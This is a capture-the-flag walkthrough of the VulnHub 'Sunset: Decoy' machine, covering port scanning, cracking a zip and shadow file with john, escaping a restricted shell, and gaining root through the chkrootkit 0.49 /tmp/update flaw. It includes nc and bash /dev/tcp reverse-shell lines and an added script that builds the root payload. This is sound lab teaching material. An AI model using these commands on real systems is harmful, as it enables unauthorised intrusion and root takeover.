PJzhang: vulnhub VM, Sunset series, SUNSET: DECOY

Meow-ning~~~

Address: https://www.vulnhub.com/entry/sunset-decoy,505/

The focus is on the tools and the line of thinking.

nmap 192.168.43.0/24
Target IP
192.168.43.32
Attacker IP
192.168.43.154

nmap -A -p1-65535 192.168.43.32

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38

Visiting http://192.168.43.32/ shows a directory listing that exposes save.zip; the archive is password protected.

    dirb http://192.168.43.32/

zip2john save.zip > pojie.hash
cat pojie.hash

john --wordlist=/usr/share/wordlists/rockyou.txt pojie.hash
Result: manuel (save.zip), i.e. the archive password is manuel.

unzip save.zip
Enter the password manuel.
It extracts an etc folder containing group, hostname, hosts, passwd, shadow and sudoers: a copy of the target's own account database.

cd /root/Desktop/etc
cat shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
john reports
server (296640a3b825115a47b68fc44501c828)

john prints cracked entries as password (username), so 296640a3b825115a47b68fc44501c828 is the username and server is its password.
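An added example, not from the original walkthrough: before pointing john at a recovered shadow file, it pays to see which accounts actually carry a crackable hash and of what type, since that decides the --format to use and which lines are dead weight (locked "!" or "*" entries). The sample shadow lines inside the demo function are constructed placeholders with realistic prefixes, not the target's real file, and the hash bodies are not valid crypt output.

```shell
#!/bin/sh
# Added example (not the original post's code): triage a shadow-format file
# before cracking it. Prints "user:algorithm" for every account whose second
# field is a real crypt(3) hash; locked and empty entries are skipped.

# Map the $id$ prefix of a crypt(3) hash to its algorithm name.
shadow_hash_algo() {
    case "$1" in
        '$1$'*)          echo md5crypt ;;
        '$2'[abxy]'$'*)  echo bcrypt ;;
        '$5$'*)          echo sha256crypt ;;
        '$6$'*)          echo sha512crypt ;;
        '$y$'*|'$7$'*)   echo yescrypt ;;
        '*'|'!'*|'')     echo locked ;;     # "*", "!", "!!" or "!<hash>" (passwd -l)
        *)               echo unknown ;;    # e.g. 13-char traditional DES
    esac
}

# $1: path to a shadow-format file. One "user:algo" line per crackable account.
shadow_triage() {
    while IFS=: read -r user hash _rest; do
        case "$user" in ''|'#'*) continue ;; esac
        algo=$(shadow_hash_algo "$hash")
        if [ "$algo" != locked ]; then
            printf '%s:%s\n' "$user" "$algo"
        fi
    done < "$1"
}

# Demo on constructed sample lines (placeholder hashes, not a real shadow file).
shadow_triage_demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:*:18000:0:99999:7:::
daemon:!:18000:0:99999:7:::
alice:$6$7hLQ2k3a$placeholderhashbodynotrealcryptoutput:18000:0:99999:7:::
guest:!$6$7hLQ2k3a$lockedaccountkeepsitsoldhash:18000:0:99999:7:::
legacy:$1$abcdefgh$placeholdermd5cryptbody:18000:0:99999:7:::
svc:$y$j9T$placeholderyescryptsalt$placeholderbody:18000:0:99999:7:::
EOF
    shadow_triage "$f"
    rm -f "$f"
}
```

Run it with shadow_triage /root/Desktop/etc/shadow against the extracted copy. john reads a shadow file directly for crypt(3) hashes; unshadow passwd shadow is only needed when you want GECOS-based word mangling. Debian 10, which the target runs, hashes with sha512crypt by default, so expect john to select that format.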

ssh 296640a3b825115a47b68fc44501c828@192.168.43.32
Password: server

The login lands in a restricted shell: -rbash: dircolors: command not found

Ask ssh to run bash instead of the login shell, skipping the profile that sets up the restrictions:
ssh 296640a3b825115a47b68fc44501c828@192.168.43.32 -t "bash --noprofile"

echo $PATH
/home/296640a3b825115a47b68fc44501c828/
Only the home directory is on the PATH, so reset it:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

cat user.txt
35253d886842075b2c6390f35946e41f

./honeypot.decoy runs a binary in the home directory that presents a menu of tasks.

cd /home/296640a3b825115a47b68fc44501c828/SV-502/logs
cat log.txt
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
The log (pspy-style process capture) shows root (UID=0) unpacking chkrootkit 0.49, so the honeypot's scan runs that version as root.

searchsploit chkrootkit
Chkrootkit 0.49 - Local Privilege Escalation linux/local/33899.txt
https://www.exploit-db.com/exploits/33899
chkrootkit up to 0.49 executes /tmp/update as the user running the scan, root here, whenever that file exists and is executable.

echo "/usr/bin/nc -e /bin/sh 192.168.43.154 4444" > /tmp/update
chmod +x /tmp/update
cd /home/296640a3b825115a47b68fc44501c828/
./honeypot.decoy
Choose
5 Launch an AV Scan.
which starts the root chkrootkit run.

On the attacker: nc -lvnp 4444

connect to [192.168.43.154] from (UNKNOWN) [192.168.43.32] 4444

Shell obtained as root:

id
uid=0(root) gid=0(root) groups=0(root)

cat root.txt
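An added example, not part of the original post, that packages the /tmp/update step: chkrootkit 0.49 runs /tmp/update as root only if the file exists and is executable, and the nc -e line works only when the target's nc supports -e (netcat-traditional or ncat; OpenBSD nc has no -e). The helper, meant to run on the target, checks that and otherwise falls back to bash's /dev/tcp, then writes and marks the file. Host 192.168.43.154 and port 4444 are the writeup's values; the path is a parameter so the file can be tested somewhere other than /tmp. update_hook_present is the defender-side check: an executable /tmp/update on a host running an old chkrootkit is itself a finding.

```shell
#!/bin/sh
# Added example (not the original post's code). Builds the file chkrootkit
# <= 0.49 will execute as root (EDB-33899) and checks the reverse-shell
# command it contains will actually run on this host.

# Does the local nc understand -e? Returns 0 if yes (netcat-traditional, ncat).
nc_supports_exec() {
    command -v nc >/dev/null 2>&1 || return 1
    nc -h 2>&1 | grep -qE -- '(^|[[:space:]])-e[, ]'
}

# Print a one-line reverse shell to HOST PORT. Prefers nc -e; otherwise uses
# bash's /dev/tcp, which exists on the Debian 10 target even without a usable nc.
reverse_shell_cmd() {
    host=$1; port=$2
    if nc_supports_exec; then
        printf 'nc -e /bin/sh %s %s\n' "$host" "$port"
    else
        printf "bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'\n" "$host" "$port"
    fi
}

# Write the payload to PATH (normally /tmp/update) for HOST PORT and mark it
# executable. Refuses a non-numeric port so a typo cannot yield a dud file
# that the root scan silently runs and discards.
build_update_payload() {
    path=$1; host=$2; port=$3
    case "$port" in ''|*[!0-9]*) echo "bad port: $port" >&2; return 2 ;; esac
    {
        printf '#!/bin/sh\n'
        reverse_shell_cmd "$host" "$port"
    } > "$path" || return 1
    chmod +x "$path"
}

# Defender-side check: is an executable "update" hook waiting in DIR (default
# /tmp)? Prints its path and returns 0 if so, 1 otherwise.
update_hook_present() {
    hook="${1:-/tmp}/update"
    if [ -x "$hook" ]; then
        echo "$hook"
        return 0
    fi
    return 1
}
```

On the target the call is build_update_payload /tmp/update 192.168.43.154 4444, with nc -lvnp 4444 already listening on the attacker; then trigger the scan from honeypot.decoy as above.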

Original URL: https://www.cnblogs.com/landesk/p/13688076.html